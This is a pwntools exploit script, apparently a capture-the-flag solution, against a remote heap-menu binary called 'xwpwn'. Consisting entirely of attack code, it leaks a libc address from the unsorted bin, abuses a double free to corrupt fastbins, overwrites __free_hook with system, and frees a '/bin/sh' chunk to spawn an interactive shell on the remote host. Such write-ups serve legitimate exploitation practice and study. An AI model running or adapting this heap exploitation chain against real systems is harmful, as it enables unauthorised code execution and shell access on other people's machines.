1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82
| from pwn import * context.log_level='debug'
p=remote('101.200.161.151',15201) elf=ELF('./xwpwn')
def add(size,content=''): p.recvuntil('choice:') p.sendline('1') p.recvuntil("Your choice:") p.sendline(str(size)) p.recvuntil("lives in:") p.send(content)
def free(index): p.recvuntil('choice:') p.sendline('2') p.recvuntil('Index of country:') p.sendline(str(index))
def change(index,content): p.recvuntil('choice:') p.sendline('3') p.recvuntil('Index of country:') p.sendline(str(index)) p.recvuntil('break out in?') p.send(content)
def show(index): p.recvuntil('choice:') p.sendline('4') p.recvuntil('Index of country:') p.sendline(str(index)) p.recvuntil('Current status:\n')
add(1,'aa') add(0,'aa') add(1,'aa') add(0,'aa') add(9,'\n')
free(0) free(2)
add(1,'\x78') show(5) unsorted=u64(p.recv(8)) print(hex(unsorted)) libc=unsorted-0x68-0x3c4b10 max_fast=libc+0x3c67a8+0x50 heap_addr=u64(p.recv(8)) print(hex(heap_addr)) print(hex(libc))
free(1) free(3) free(1)
victim=heap_addr-0x12a0+0x80+0x20 add(9,p64(victim)) add(9,'\n') add(9,'\n') add(9,p64(0x21))
free(4) free(7) free(4)
add(0,p64(victim+0x8)) add(0,'/bin/sh\x00') add(0,'\n') print(hex(victim)) free_hook=libc+0x3c67a8 add(9,p64(free_hook)) system=libc+0x45390 change(5,p64(system)) free(11) p.interactive()
|